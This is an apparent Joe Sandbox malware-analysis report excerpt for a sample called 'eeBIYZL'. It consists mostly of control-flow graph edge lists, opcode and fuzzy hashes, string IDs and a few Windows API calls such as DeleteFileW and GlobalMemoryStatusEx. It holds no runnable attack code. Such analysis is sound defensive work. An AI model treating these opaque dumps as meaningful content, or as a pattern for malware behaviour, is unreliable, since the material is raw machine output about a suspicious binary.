6a75696-6a7569f 2300->2308 2309 6a756a0-6a756a3 2300->2309 2303->2290 2304->2285 2310 6a757ec-6a757ef 2304->2310 2314 6a75814-6a75817 2305->2314 2315 6a7580c-6a75813 2305->2315 2311 6a75802 2306->2311 2312 6a7585e-6a75865 2306->2312 2316 6a758c7-6a758ca 2307->2316 2317 6a758ab-6a758bc 2307->2317 2318 6a756a5-6a756ba 2309->2318 2319 6a756bf-6a756c2 2309->2319 2310->2296 2311->2305 2322 6a7582f-6a75832 2314->2322 2323 6a75819-6a7582a 2314->2323 2320 6a75bb3-6a75bb6 2316->2320 2321 6a758d0-6a75a64 2316->2321 2331 6a75bc5-6a75bcc 2317->2331 2332 6a758c2 2317->2332 2318->2319 2319->2243 2319->2256 2327 6a75bc0-6a75bc3 2320->2327 2328 6a75bb8-6a75bbd 2320->2328 2386 6a75b9d-6a75bb0 2321->2386 2387 6a75a6a-6a75a71 2321->2387 2325 6a75834-6a75838 2322->2325 2326 6a7584c-6a7584e 2322->2326 2323->2322 2325->2285 2334 6a7583a-6a75842 2325->2334 2336 6a75855-6a75858 2326->2336 2337 6a75850 2326->2337 2327->2331 2333 6a75bd1-6a75bd4 2327->2333 2328->2327 2331->2333 2332->2316 2338 6a75bd6-6a75be9 2333->2338 2339 6a75bec-6a75bef 2333->2339 2334->2285 2340 6a75844-6a75847 2334->2340 2336->2276 2336->2312 2337->2336 2342 6a75bf1-6a75c02 2339->2342 2343 6a75c09-6a75c0c 2339->2343 2340->2326 2349 6a75c04 2342->2349 2350 6a75c3d-6a75c4e 2342->2350 2343->2321 2345 6a75c12-6a75c15 2343->2345 2345->2321 2348 6a75c1b-6a75c1e 2345->2348 2351 6a75c20-6a75c31 2348->2351 2352 6a75c38-6a75c3b 2348->2352 2349->2343 2350->2331 2360 6a75c54 2350->2360 2351->2338 2359 6a75c33 2351->2359 2352->2350 2353 6a75c59-6a75c5c 2352->2353 2357 6a75c5e-6a75c65 2353->2357 2358 6a75c6a-6a75c6d 2353->2358 2357->2358 2361 6a75c6f-6a75c80 2358->2361 2362 6a75c8b-6a75c8d 2358->2362 2359->2352 2360->2353 2361->2331 2369 6a75c86 2361->2369 2364 6a75c94-6a75c97 2362->2364 2365 6a75c8f 2362->2365 2364->2307 2366 6a75c9d-6a75ca6 2364->2366 2365->2364 2369->2362 2388 6a75a77-6a75aaa 2387->2388 2389 6a75b25-6a75b2c 2387->2389 2400 6a75aaf-6a75af0 2388->2400 2401 6a75aac 2388->2401 2389->2386 2390 6a75b2e-6a75b61 2389->2390 2402 6a75b66-6a75b93 2390->2402 2403 6a75b63 2390->2403 2411 6a75af2-6a75b03 2400->2411 2412 6a75b08-6a75b0f 2400->2412 2401->2400 2402->2366 2403->2402 2411->2366 2414 6a75b17-6a75b19 2412->2414 2414->2366
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $
                                  • API String ID: 0-3993045852
                                  • Opcode ID: 25d09bcd189abe0bb6659196ec2d13b285597207c17215d43382852d0a5fdf8a
                                  • Instruction ID: a1cf7da2b9c55c524cacbb18007495a5aa172994957f997c898634f34b30a0d0
                                  • Opcode Fuzzy Hash: 25d09bcd189abe0bb6659196ec2d13b285597207c17215d43382852d0a5fdf8a
                                  • Instruction Fuzzy Hash: 4C22D335E002198FDF60EBA4C9806AEBBB2FF89310F248569D415AF395DB35ED41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A765C8 Relevance: .8, Instructions: 817COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 455fd1416813bed1001141843055237912395cb687ca26c1757b5d08eb77cfd0
                                  • Instruction ID: adf23f3fde366030eaba1620c17ad48f76ea88aed0c66ef9c5e2e567b913e4a8
                                  • Opcode Fuzzy Hash: 455fd1416813bed1001141843055237912395cb687ca26c1757b5d08eb77cfd0
                                  • Instruction Fuzzy Hash: 7862AE30B006058FDB64EB68DA84BADB7F6EF84310F249569E406EB355DB35EC46CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7C138 Relevance: .6, Instructions: 637COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e39e2b31848b3c8e6ae78c891f2833317978f6a564408c91c432cf489a4365e
                                  • Instruction ID: ef932b1f1d9d786c6c8e1f847b6d747e0e8d049004c3739fd5773f8e40e5aebc
                                  • Opcode Fuzzy Hash: 5e39e2b31848b3c8e6ae78c891f2833317978f6a564408c91c432cf489a4365e
                                  • Instruction Fuzzy Hash: B2327034B102159FDF54EB68E994BADB7B6FB88320F208525E406EB359DB35EC41CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7AC90 Relevance: 10.4, Strings: 8, Instructions: 388COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 6a7ac90-6a7acae 1 6a7acb0-6a7acb3 0->1 2 6a7acd6-6a7acd9 1->2 3 6a7acb5-6a7acd1 1->3 4 6a7ace3-6a7ace6 2->4 5 6a7acdb-6a7ace0 2->5 3->2 7 6a7acf7-6a7acfa 4->7 8 6a7ace8-6a7acec 4->8 5->4 11 6a7acfc-6a7ad05 7->11 12 6a7ad0a-6a7ad0d 7->12 9 6a7acf2 8->9 10 6a7aebc-6a7aec6 8->10 9->7 11->12 14 6a7ad21-6a7ad24 12->14 15 6a7ad0f-6a7ad1c 12->15 16 6a7ad26-6a7ad2f 14->16 17 6a7ad3e-6a7ad41 14->17 15->14 19 6a7aec7-6a7aefe 16->19 20 6a7ad35-6a7ad39 16->20 21 6a7ad47-6a7ad4a 17->21 22 6a7aead-6a7aeb6 17->22 30 6a7af00-6a7af03 19->30 20->17 23 6a7ad64-6a7ad66 21->23 24 6a7ad4c-6a7ad5f 21->24 22->10 22->16 25 6a7ad6d-6a7ad70 23->25 26 6a7ad68 23->26 24->23 25->1 29 6a7ad76-6a7ad9a 25->29 26->25 47 6a7ada0-6a7adaf 29->47 48 6a7aeaa 29->48 31 6a7af05-6a7af09 30->31 32 6a7af10-6a7af13 30->32 33 6a7af61-6a7af9c 31->33 34 6a7af0b 31->34 35 6a7af36-6a7af39 32->35 36 6a7af15-6a7af31 32->36 45 6a7afa2-6a7afae 33->45 46 6a7b18f-6a7b1a2 33->46 34->32 38 6a7af46-6a7af49 35->38 39 6a7af3b-6a7af45 35->39 36->35 42 6a7af4b 38->42 43 6a7af58-6a7af5b 38->43 123 6a7af4b call 6a7b1e8 42->123 124 6a7af4b call 6a7b1f8 42->124 43->33 49 6a7b1c4-6a7b1c6 43->49 58 6a7afb0-6a7afc9 45->58 59 6a7afce-6a7b012 45->59 50 6a7b1a4 46->50 60 6a7adc7-6a7ae02 call 6a76578 47->60 61 6a7adb1-6a7adb7 47->61 48->22 51 6a7b1cd-6a7b1d0 49->51 52 6a7b1c8 49->52 50->49 51->30 57 6a7b1d6-6a7b1e0 51->57 52->51 54 6a7af51-6a7af53 54->43 58->50 77 6a7b014-6a7b026 59->77 78 6a7b02e-6a7b06d 59->78 75 6a7ae04-6a7ae0a 60->75 76 6a7ae1a-6a7ae31 60->76 62 6a7adbb-6a7adbd 61->62 63 6a7adb9 61->63 62->60 63->60 79 6a7ae0e-6a7ae10 75->79 80 6a7ae0c 75->80 89 6a7ae33-6a7ae39 76->89 90 6a7ae49-6a7ae5a 76->90 77->78 84 6a7b154-6a7b169 78->84 85 6a7b073-6a7b14e call 6a76578 78->85 79->76 80->76 84->46 85->84 92 6a7ae3d-6a7ae3f 89->92 93 6a7ae3b 89->93 97 6a7ae72-6a7aea3 90->97 98 6a7ae5c-6a7ae62 90->98 92->90 93->90 97->48 100 6a7ae66-6a7ae68 98->100 101 6a7ae64 98->101 100->97 101->97 123->54 124->54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-666546452
                                  • Opcode ID: 1fcecec0936bea59a8aba89a6d2f90bb9c928ff7d2a38269e4eb6f0f3009fe0b
                                  • Instruction ID: 56af0995d45ca8fb86d7fe8203cb8424c7c7861a3ad3bb84b5928fc7f4ed30ca
                                  • Opcode Fuzzy Hash: 1fcecec0936bea59a8aba89a6d2f90bb9c928ff7d2a38269e4eb6f0f3009fe0b
                                  • Instruction Fuzzy Hash: 51E18F30E102199FDB65EF69D9906AEB7B6FF85300F208529D905EB358DB34EC46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A79118 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 860 6a79118-6a7913d 861 6a7913f-6a79142 860->861 862 6a79144-6a79163 861->862 863 6a79168-6a7916b 861->863 862->863 864 6a79171-6a79186 863->864 865 6a79a2b-6a79a2d 863->865 872 6a7919e-6a791b4 864->872 873 6a79188-6a7918e 864->873 866 6a79a34-6a79a37 865->866 867 6a79a2f 865->867 866->861 869 6a79a3d-6a79a47 866->869 867->866 877 6a791bf-6a791c1 872->877 874 6a79192-6a79194 873->874 875 6a79190 873->875 874->872 875->872 878 6a791c3-6a791c9 877->878 879 6a791d9-6a7924a 877->879 880 6a791cd-6a791cf 878->880 881 6a791cb 878->881 890 6a79276-6a79292 879->890 891 6a7924c-6a7926f 879->891 880->879 881->879 896 6a79294-6a792b7 890->896 897 6a792be-6a792d9 890->897 891->890 896->897 902 6a79304-6a7931f 897->902 903 6a792db-6a792fd 897->903 908 6a79321-6a79343 902->908 909 6a7934a-6a79354 902->909 903->902 908->909 910 6a79356-6a7935f 909->910 911 6a79364-6a793de 909->911 910->869 917 6a793e0-6a793fe 911->917 918 6a7942b-6a79440 911->918 922 6a79400-6a7940f 917->922 923 6a7941a-6a79429 917->923 918->865 922->923 923->917 923->918
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq
                                  • API String ID: 0-2428501249
                                  • Opcode ID: 8492ccc9faf27795b83bd0342a644b979c581f9ed33f8fa3139d1e554637ae5a
                                  • Instruction ID: 8e6cc0ce88914d5664ba8b70e86f20b496b6315a2ef3d63396898a335134b552
                                  • Opcode Fuzzy Hash: 8492ccc9faf27795b83bd0342a644b979c581f9ed33f8fa3139d1e554637ae5a
                                  • Instruction Fuzzy Hash: AE910F70B0021A8FDB94EB75D9507AF77FAEF85200F108569D409AB358EF749D458B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7CF00 Relevance: 4.5, Strings: 3, Instructions: 796COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 926 6a7cf00-6a7cf1b 927 6a7cf1d-6a7cf20 926->927 928 6a7cf22-6a7cf64 927->928 929 6a7cf69-6a7cf6c 927->929 928->929 930 6a7cf76-6a7cf79 929->930 931 6a7cf6e-6a7cf73 929->931 932 6a7cf9c-6a7cf9f 930->932 933 6a7cf7b-6a7cf97 930->933 931->930 935 6a7cfa1-6a7cfa3 932->935 936 6a7cfae-6a7cfb1 932->936 933->932 939 6a7d2a7-6a7d2b0 935->939 940 6a7cfa9 935->940 941 6a7cfb3-6a7cff5 936->941 942 6a7cffa-6a7cffd 936->942 945 6a7d2b2-6a7d2b7 939->945 946 6a7d2bf-6a7d2cb 939->946 940->936 941->942 943 6a7cfff-6a7d001 942->943 944 6a7d00c-6a7d00f 942->944 948 6a7d007 943->948 949 6a7d3e9 943->949 950 6a7d011-6a7d053 944->950 951 6a7d058-6a7d05b 944->951 945->946 954 6a7d2d1-6a7d2e5 946->954 955 6a7d3dc-6a7d3e1 946->955 948->944 956 6a7d3ec-6a7d3f8 949->956 950->951 957 6a7d0a4-6a7d0a7 951->957 958 6a7d05d-6a7d09f 951->958 954->949 968 6a7d2eb-6a7d2fd 954->968 955->949 963 6a7d1e2-6a7d1f1 956->963 964 6a7d3fe-6a7d6eb 956->964 961 6a7d0f0-6a7d0f3 957->961 962 6a7d0a9-6a7d0b8 957->962 958->957 961->956 972 6a7d0f9-6a7d0fc 961->972 969 6a7d0c7-6a7d0d3 962->969 970 6a7d0ba-6a7d0bf 962->970 973 6a7d1f3-6a7d1f8 963->973 974 6a7d200-6a7d20c 963->974 1139 6a7d912-6a7d91c 964->1139 1140 6a7d6f1-6a7d6f7 964->1140 991 6a7d321-6a7d323 968->991 992 6a7d2ff-6a7d305 968->992 977 6a7d91d-6a7d956 969->977 978 6a7d0d9-6a7d0eb 969->978 970->969 980 6a7d145-6a7d148 972->980 981 6a7d0fe-6a7d140 972->981 973->974 976 6a7d212-6a7d224 974->976 974->977 1001 6a7d229-6a7d22c 976->1001 1004 6a7d958-6a7d95b 977->1004 978->961 985 6a7d191-6a7d194 980->985 986 6a7d14a-6a7d18c 980->986 981->980 988 6a7d196-6a7d1d8 985->988 989 6a7d1dd-6a7d1e0 985->989 986->985 988->989 989->963 989->1001 1005 6a7d32d-6a7d339 991->1005 999 6a7d307 992->999 1000 6a7d309-6a7d315 992->1000 1007 6a7d317-6a7d31f 999->1007 1000->1007 1008 6a7d275-6a7d278 1001->1008 1009 6a7d22e-6a7d270 1001->1009 1011 6a7d97e-6a7d981 1004->1011 1012 6a7d95d-6a7d979 1004->1012 1028 6a7d347 1005->1028 1029 6a7d33b-6a7d345 1005->1029 1007->1005 1020 6a7d295-6a7d297 1008->1020 1021 6a7d27a-6a7d290 1008->1021 1009->1008 1022 6a7d9b4-6a7d9b7 1011->1022 1023 6a7d983-6a7d9af 1011->1023 1012->1011 1033 6a7d29e-6a7d2a1 1020->1033 1034 6a7d299 1020->1034 1021->1020 1035 6a7d9c6-6a7d9c8 1022->1035 1036 6a7d9b9 1022->1036 1023->1022 1038 6a7d34c-6a7d34e 1028->1038 1029->1038 1033->927 1033->939 1034->1033 1041 6a7d9cf-6a7d9d2 1035->1041 1042 6a7d9ca 1035->1042 1186 6a7d9b9 call 6a7da75 1036->1186 1187 6a7d9b9 call 6a7da88 1036->1187 1038->949 1045 6a7d354-6a7d370 call 6a76578 1038->1045 1041->1004 1050 6a7d9d4-6a7d9e3 1041->1050 1042->1041 1069 6a7d372-6a7d377 1045->1069 1070 6a7d37f-6a7d38b 1045->1070 1049 6a7d9bf-6a7d9c1 1049->1035 1059 6a7d9e5-6a7da48 call 6a76578 1050->1059 1060 6a7da4a-6a7da5f 1050->1060 1059->1060 1075 6a7da60 1060->1075 1069->1070 1070->955 1074 6a7d38d-6a7d3da 1070->1074 1074->949 1075->1075 1141 6a7d706-6a7d70f 1140->1141 1142 6a7d6f9-6a7d6fe 1140->1142 1141->977 1143 6a7d715-6a7d728 1141->1143 1142->1141 1145 6a7d902-6a7d90c 1143->1145 1146 6a7d72e-6a7d734 1143->1146 1145->1139 1145->1140 1147 6a7d736-6a7d73b 1146->1147 1148 6a7d743-6a7d74c 1146->1148 1147->1148 1148->977 1149 6a7d752-6a7d773 1148->1149 1152 6a7d775-6a7d77a 1149->1152 1153 6a7d782-6a7d78b 1149->1153 1152->1153 1153->977 1154 6a7d791-6a7d7ae 1153->1154 1154->1145 1157 6a7d7b4-6a7d7ba 1154->1157 1157->977 1158 6a7d7c0-6a7d7d9 1157->1158 1160 6a7d8f5-6a7d8fc 1158->1160 1161 6a7d7df-6a7d806 1158->1161 1160->1145 1160->1157 1161->977 1164 6a7d80c-6a7d816 1161->1164 1164->977 1165 6a7d81c-6a7d833 1164->1165 1167 6a7d835-6a7d840 1165->1167 1168 6a7d842-6a7d85d 1165->1168 1167->1168 1168->1160 1173 6a7d863-6a7d87c call 6a76578 1168->1173 1177 6a7d87e-6a7d883 1173->1177 1178 6a7d88b-6a7d894 1173->1178 1177->1178 1178->977 1179 6a7d89a-6a7d8ee 1178->1179 1179->1160 1186->1049 1187->1049
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq
                                  • API String ID: 0-3696375380
                                  • Opcode ID: 6181e33b6856ae8a62498eb36a03d38ad856ecc1dc42c139488aecc81f6dfe5c
                                  • Instruction ID: d43253f61005d662649c3de6e7777a35f988303d72c3195fda08ad4a5d6cda06
                                  • Opcode Fuzzy Hash: 6181e33b6856ae8a62498eb36a03d38ad856ecc1dc42c139488aecc81f6dfe5c
                                  • Instruction Fuzzy Hash: 1A623030A002168FCB55EF69EA90A9DB7F6FF84304F208668D4059F369DB75ED46CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A74B38 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1188 6a74b38-6a74b5c 1189 6a74b5e-6a74b61 1188->1189 1190 6a74b67-6a74c5f 1189->1190 1191 6a75240-6a75243 1189->1191 1211 6a74c65-6a74cad 1190->1211 1212 6a74ce2-6a74ce9 1190->1212 1192 6a75245-6a7525f 1191->1192 1193 6a75264-6a75266 1191->1193 1192->1193 1195 6a7526d-6a75270 1193->1195 1196 6a75268 1193->1196 1195->1189 1198 6a75276-6a75283 1195->1198 1196->1195 1234 6a74cb2 call 6a753e0 1211->1234 1235 6a74cb2 call 6a753f0 1211->1235 1213 6a74cef-6a74d5f 1212->1213 1214 6a74d6d-6a74d76 1212->1214 1231 6a74d61 1213->1231 1232 6a74d6a 1213->1232 1214->1198 1225 6a74cb8-6a74cd4 1229 6a74cd6 1225->1229 1230 6a74cdf-6a74ce0 1225->1230 1229->1230 1230->1212 1231->1232 1232->1214 1234->1225 1235->1225
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: foq$XPoq$\Ooq
                                  • API String ID: 0-3137531485
                                  • Opcode ID: f9bddb33fec3bb4968d227e02c7856c48500b943665758b1d4ab908b08033b9f
                                  • Instruction ID: 35c42c4d7dea42292b9e5816201476f90754ee636e159a3f69df3501fd20b125
                                  • Opcode Fuzzy Hash: f9bddb33fec3bb4968d227e02c7856c48500b943665758b1d4ab908b08033b9f
                                  • Instruction Fuzzy Hash: 96618270F002199FEF54AFA9C8547AEBAF6FF88300F208529D506AB395DE759C45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A79108 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2136 6a79108-6a7913d 2137 6a7913f-6a79142 2136->2137 2138 6a79144-6a79163 2137->2138 2139 6a79168-6a7916b 2137->2139 2138->2139 2140 6a79171-6a79186 2139->2140 2141 6a79a2b-6a79a2d 2139->2141 2148 6a7919e-6a791b4 2140->2148 2149 6a79188-6a7918e 2140->2149 2142 6a79a34-6a79a37 2141->2142 2143 6a79a2f 2141->2143 2142->2137 2145 6a79a3d-6a79a47 2142->2145 2143->2142 2153 6a791bf-6a791c1 2148->2153 2150 6a79192-6a79194 2149->2150 2151 6a79190 2149->2151 2150->2148 2151->2148 2154 6a791c3-6a791c9 2153->2154 2155 6a791d9-6a7924a 2153->2155 2156 6a791cd-6a791cf 2154->2156 2157 6a791cb 2154->2157 2166 6a79276-6a79292 2155->2166 2167 6a7924c-6a7926f 2155->2167 2156->2155 2157->2155 2172 6a79294-6a792b7 2166->2172 2173 6a792be-6a792d9 2166->2173 2167->2166 2172->2173 2178 6a79304-6a7931f 2173->2178 2179 6a792db-6a792fd 2173->2179 2184 6a79321-6a79343 2178->2184 2185 6a7934a-6a79354 2178->2185 2179->2178 2184->2185 2186 6a79356-6a7935f 2185->2186 2187 6a79364-6a793de 2185->2187 2186->2145 2193 6a793e0-6a793fe 2187->2193 2194 6a7942b-6a79440 2187->2194 2198 6a79400-6a7940f 2193->2198 2199 6a7941a-6a79429 2193->2199 2194->2141 2198->2199 2199->2193 2199->2194
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 1c8cd703c7072be988c4a0571ad1e3ecfe7cf4ddc74742bbdfcc5111a37f9c16
                                  • Instruction ID: adbf989e5afdaabb7796df7dadb63524260df4cbebe20dbf1c827bf5296d5b5a
                                  • Opcode Fuzzy Hash: 1c8cd703c7072be988c4a0571ad1e3ecfe7cf4ddc74742bbdfcc5111a37f9c16
                                  • Instruction Fuzzy Hash: 1F512070B002159FDB94EB79D950BAF77FAEB89600F108569D40AEB358EF359C418B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C6781C Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2415 2c6781c-2c681ba 2418 2c681c2-2c681ed DeleteFileW 2415->2418 2419 2c681bc-2c681bf 2415->2419 2420 2c681f6-2c6821e 2418->2420 2421 2c681ef-2c681f5 2418->2421 2419->2418 2421->2420
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 02C681E0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3280956654.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2c60000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 8a7513bb38d93321cdf52eaac0e72e195b29da604c1344ee353de51f282e6ccf
                                  • Instruction ID: d017272bf5be7bdb7274f39ac88915d25400025da583d677737db788d49d1a16
                                  • Opcode Fuzzy Hash: 8a7513bb38d93321cdf52eaac0e72e195b29da604c1344ee353de51f282e6ccf
                                  • Instruction Fuzzy Hash: 5D2127B1C0065A9BCB10DF9AC9447AEFBF4FF48310F108569E918B7240D738A944CFA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C68168 Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2424 2c68168-2c681ba 2426 2c681c2-2c681ed DeleteFileW 2424->2426 2427 2c681bc-2c681bf 2424->2427 2428 2c681f6-2c6821e 2426->2428 2429 2c681ef-2c681f5 2426->2429 2427->2426 2429->2428
                                  APIs
                                  • DeleteFileW.KERNELBASE(00000000), ref: 02C681E0
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3280956654.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2c60000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 6b20d9fe262e01a0e31c9feac4e14e91ebd1eed141b94e82a59280ff07a5c8fd
                                  • Instruction ID: 9c5155d4a07857ff6d4035e9abd36df4951afc89d294fbf81e3798db41fcf4a0
                                  • Opcode Fuzzy Hash: 6b20d9fe262e01a0e31c9feac4e14e91ebd1eed141b94e82a59280ff07a5c8fd
                                  • Instruction Fuzzy Hash: D82127B1C0065A9FCB24CF9AD9457AEFBF0FF48310F14865AD918A7640D738AA44CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 02C6F088 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2432 2c6f088-2c6f0fc GlobalMemoryStatusEx 2434 2c6f105-2c6f12d 2432->2434 2435 2c6f0fe-2c6f104 2432->2435 2435->2434
                                  APIs
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 02C6F0EF
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3280956654.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_2c60000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID: GlobalMemoryStatus
                                  • String ID:
                                  • API String ID: 1890195054-0
                                  • Opcode ID: 0f478bf19146aef6931acc63ce0a97ae7195853dcc7c8e6e8d94a30a98bb224e
                                  • Instruction ID: 498dd5fad6a69797351e68c34a3467173e489e96a4347c80cde7f79b71227948
                                  • Opcode Fuzzy Hash: 0f478bf19146aef6931acc63ce0a97ae7195853dcc7c8e6e8d94a30a98bb224e
                                  • Instruction Fuzzy Hash: 3711E2B1C006599BCB10DF9AD544AAEFBF4AF48320F15816AD818A7240D779A944CFE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A74B29 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2497 6a74b29-6a74b5c 2498 6a74b5e-6a74b61 2497->2498 2499 6a74b67-6a74c5f 2498->2499 2500 6a75240-6a75243 2498->2500 2520 6a74c65-6a74cad 2499->2520 2521 6a74ce2-6a74ce9 2499->2521 2501 6a75245-6a7525f 2500->2501 2502 6a75264-6a75266 2500->2502 2501->2502 2504 6a7526d-6a75270 2502->2504 2505 6a75268 2502->2505 2504->2498 2507 6a75276-6a75283 2504->2507 2505->2504 2543 6a74cb2 call 6a753e0 2520->2543 2544 6a74cb2 call 6a753f0 2520->2544 2522 6a74cef-6a74d5f 2521->2522 2523 6a74d6d-6a74d76 2521->2523 2540 6a74d61 2522->2540 2541 6a74d6a 2522->2541 2523->2507 2534 6a74cb8-6a74cd4 2538 6a74cd6 2534->2538 2539 6a74cdf-6a74ce0 2534->2539 2538->2539 2539->2521 2540->2541 2541->2523 2543->2534 2544->2534
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XPoq
                                  • API String ID: 0-2250694691
                                  • Opcode ID: 2a0b635c985722b90577474cfd311d958a4143e8b4d0eeb618bc53e6c4ffc228
                                  • Instruction ID: e02cfe497e5aa25d38eb4606480e9b20730ddfc222eeea144033f681070e49c2
                                  • Opcode Fuzzy Hash: 2a0b635c985722b90577474cfd311d958a4143e8b4d0eeb618bc53e6c4ffc228
                                  • Instruction Fuzzy Hash: 4A414F70E002199FDB55EFA5C854BAEBBF6BF88300F208529D105AB3A5DA749C05CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 06A7DA88 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000E.00000002.3328967876.0000000006A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_14_2_6a70000_eeBIYZL.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PHjq
                                  • API String ID: 0-751881793
                                  • Opcode ID: fa286fcd10a5f06e841807f697f56e75e4c5fe7b9baf5dab25e00690103e1058
                                  • Instruction ID: a732f32336a68b7ce2a7753f8f727f565a1e607f0225ed570677f2d4103aaf28
                                  • Opcode Fuzzy Hash: fa286fcd10a5f06e841807f697f56e75e4c5fe7b9baf5dab25e00690103e1058
